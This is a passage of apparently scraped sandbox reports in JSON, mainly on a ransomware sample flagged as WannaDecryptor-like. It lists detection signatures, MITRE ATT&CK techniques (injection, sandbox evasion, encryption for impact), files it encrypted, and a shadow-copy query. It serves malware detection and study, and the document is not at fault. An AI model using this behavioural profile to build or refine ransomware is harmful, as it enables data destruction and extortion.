"\"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" has section name .text with entropy \"6.4042351061\"\n \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" has section name .rdata with entropy \"6.66357096841\"\n \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" has section name .rsrc with entropy \"6.52161823728\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"WannaDecryptor\" matched file \"sample.bin\" as \"Detection for common strings of WannaDecryptor\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21
https://hybrid-analysis.com/sample/8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21
Hybrid Analysis - Ransomware
{"size": 151040, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21", "sha256": "8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21", "av_detect": 93, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 97, "extracted_files": [{"name": "3OYkmrLQx.README.txt", "file_size": 1722, "sha256": "9664712bd62fb4b5cef4e66ef071d8ef50b62a94cc3657b48c9810ff396276f0", "type_tags": ["text"], "description": "ASCII text, with CRLF, LF line terminators", "runtime_process": "8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe (PID: 2940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002940", "name": "8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe", "normalized_path": "C:\\8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe", "sha256": "8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"GetLastError\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetCommandLineW\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"LoadImageW\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"DefWindowProcW\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"CreateWindowExW\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"LoadMenuW\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetDeviceCaps\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"SelectObject\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"GetTextColor\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"CreateSolidBrush\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API (Indicator: \"BitBlt\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\%OSUSER%-PC-20171203-1827b.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\%OSUSER%-PC-20171204-1724.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\JavaDeployReg.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jawshtml.html.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jusched.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Microsoft .NET Framework 4.7.1 Setup_20171203_174215874.html.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ProcessList.txt.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_000_core_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_001_dev_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_002_exe_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_003_lib_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_004_test_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_005_doc_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Python 3.6.3 (32-bit)_20171204192711_006_tools_JustForMe.log.3OYkmrLQx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VirtualBox Dropped Files\\2023-05-31T20_30_42.415039000Z\\tor-expert-bundle-12.0.4-windows-i686.zip.3OYkmrLQx\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74DE0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\e50694f96d8d5aead5eff8df3d17e2e7\"\n \"Global\\e50694f96d8d5aead5eff8df3d17e2e7\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" touched \"WbemAdministrativeLocator Class\" (Path: \"HKCU\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" touched \"Microsoft WBEM Call Context\" (Path: \"HKCU\\CLSID\\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\TREATAS\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" touched \"Microsoft WBEM WbemClassObject Marshalling proxy\" (Path: \"HKCU\\CLSID\\{4590F812-1D3A-11D0-891F-00AA004B2E24}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\System32\\*.dll\" [Source: 00000000-00002940-00000C2B-1145762924]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00002940-00000C28-2884872671]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"SELECT * FROM Win32_ShadowCopy\" (Source: 00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp, Indicator: \"select * from win32_shadowcopy\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\" file has an entrypoint instructions - \"nop\t,nop\tword ptr [eax + eax],call\t0x419000,nop\tword ptr [eax + eax],call\t0x40639c,nop\tword ptr [eax + eax],call\t0x409960,nop\tword ptr [eax + eax],call\t0x4173b4,nop\tword ptr [eax + eax],push\t0,call\tdword ptr [0x4255c8],nop\tdword ptr [eax + eax],call\t0x418d28,call\t0x418d2e,call\t0x418d16,call\t0x418d1c,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-4", "type": 6, "relevance": 1, "name": "Creates a writable file in a temporary directory", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" created file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\3OYkmrLQx.README.txt\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706c0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"KERNEL32\" at base 77250000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 72400000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"NTDLL\" at base 773c0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"USERENV.DLL\" at base 75520000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"USER32.DLL\" at base 76ae0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"GDI32.DLL\" at base 77520000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"SHELL32.DLL\" at base 756b0000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"OLE32.DLL\" at base 76450000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"SHLWAPI.DLL\" at base 76300000\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" loaded module \"OLEAUT32.DLL\" at base 765b0000\n 